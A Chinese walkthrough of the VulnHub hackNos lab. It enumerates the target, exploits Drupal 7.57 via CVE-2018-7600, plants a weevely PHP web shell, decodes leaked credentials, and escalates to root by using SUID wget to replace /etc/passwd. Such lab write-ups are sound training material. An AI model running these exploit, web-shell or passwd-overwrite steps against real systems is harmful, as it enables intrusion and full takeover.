Vulbhub-hackNos

1、寻址靶机的IP

2、扫描靶机开放的端口

ssh-22   apache-80

3、访问web网站

这是apache说明文章,我们因此对其进行网站扫描

4、使用gobuster进行目录扫描‘’

gobuster dir -u http://192.168.0.109 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

 

我们可以发现有 drupal网站,我们进去访问

 可以发现是一个登录界面,从网页信息中可以获得一个用户james

我们在对drupal进行目录扫描

 

可以看到用户泄露,我们对admin进行解密得到其密码为admin 123

 我尝试在网页登录和ssh登录都无法登录成功

4、我们对其网站进行cms指纹识别

可以了解到drupal版本在7左右,通过drupal目录下有个文件CHANGELOG.txt

可以了解到drupal版本在7.57

 5、寻找drupal漏洞

可以在网上寻找到drupal7.57漏洞 ,GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600 找到exp

这个漏洞是可以进行远程命令执行漏洞

python drupa7-CVE-2018-7600.py http://192.168.0.109/drupal -c "ls"

因此我们可以进行上传马,我们使用蚁剑连接

首先在kali中开启apache服务

python3 -m http.server 8888

 

 

 蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell

蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell

──(root㉿wxs)-[~/anyue/hackNos]
└─# weevely generate 123 Nos.php

123连接密码,Nos.php文件,进行连接

┌──(root㉿wxs)-[~/anyue/hackNos/drupal]
└─# weevely http://192.168.0.109/drupal/Nos.php 123

 进行反弹shell后,我们进行查找信息

 找到一个base64文件,我们进行解密

 

 解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密

 得到-james-Hacker@4514

 无法ssh登录,尝试网页登录

 网页登录但是没什么用,接着使用之前反弹shell进行提权

  

 可以看见有个wget 和 passwd 因此我们可以进行suid提权

看到了wget,以及passwd。接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户

我们就可以给其复制到本地然后生成一个hash值添加进去

openssl passwd -l -salt 用户名 passwd

 生成密码后我们需要创建/etc/passwd然后让靶机下载

 那个0:0标记着root权限

最后我们进行切换用户

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sxmmmmmmm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值